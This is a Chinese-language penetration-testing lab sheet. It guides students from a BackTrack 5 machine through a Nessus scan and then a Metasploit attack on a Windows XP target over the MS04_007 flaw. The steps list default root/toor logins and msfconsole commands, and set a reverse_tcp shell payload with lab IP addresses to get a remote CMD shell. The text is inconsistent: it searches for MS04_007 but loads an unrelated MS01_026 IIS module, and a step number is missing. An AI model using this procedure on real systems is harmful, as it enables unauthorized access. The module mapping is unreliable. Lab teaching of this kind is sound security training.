课程编写 | ||
类别 | 内容 | |
实验课题名称 | 利用MS04_007系统漏洞攻击 | |
实验目的与要求 | 掌握Metasploit的常用方法 | |
实验环境 | 软件描述 | 1、nessus 2、metasploit |
实验环境描述 | 1、渗透机Bt5 2、靶机windows xp | |
预备知识 | Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。 | |
实验内容 | 1.使用nessus扫描目标主机漏洞 2.漏洞利用 3.提权 | |
实验步骤 | 1、 学生单击实验拓扑按钮,进入实验场景,进入目标主机,(第一次启动目标主机,还需要安装java空间),如 图所示: 2、打开目标主机bt5,进入如下命令行模式,输入用户名:root,密码:toor,然后输入startx进入图形界面。 新手我们建议进入图形界面进行相应的操作。如图所示:
3、进入图形化界面后,可以看到BackTrack的整个界面,如图所示:
4、打开terminal,输入Firefox https://localhost:8834打开nessus 扫描工具。 5.输入用户名root,密码toor登录nessus页面。 6.新建扫描(New Scan) 7.设置扫描参数,如:name:扫描名称 Type:扫描类型,Run Now、Template、scheduled。 Scan targets :扫描目标靶机。 然后进行扫描。 8、扫描status:running。 9.扫描完成后,查看系统漏洞情况,其中存在MS04_007漏洞。 10.简单查看ms04_007漏洞信息。 11.使用工具metasploit针对ms04_007进行攻击。 MSFConsole是最有效率、最有能力、多合一的接口之一,方便渗透测试者更好地利用漏洞利用程序框架。在terminal终端上输入msfconsole打开metasploit工具,如图所示: 12.使用命令search ms04_007查看该漏洞使用的exploit模块,如图: 13.使用模块use exploit/windows/iis/ms01_026_dbldecode,然后使用show options查看设置参数。 15.设置RHOST 192.168.1.173, payload windows/shell/reverse_tcp如图: 16.设置LHOST 192.168.1.174 17. 接下来进行漏洞利用,会看到ip 192.168.1.173反弹连接到了我们本地的4444端口了,并且还是拥有CMD权限。如图所示。 18.使用ipconfig命令,可以查看到已经渗透到192.168.1.173靶机上。 19、实验完毕,关闭虚拟机和所有窗口。 |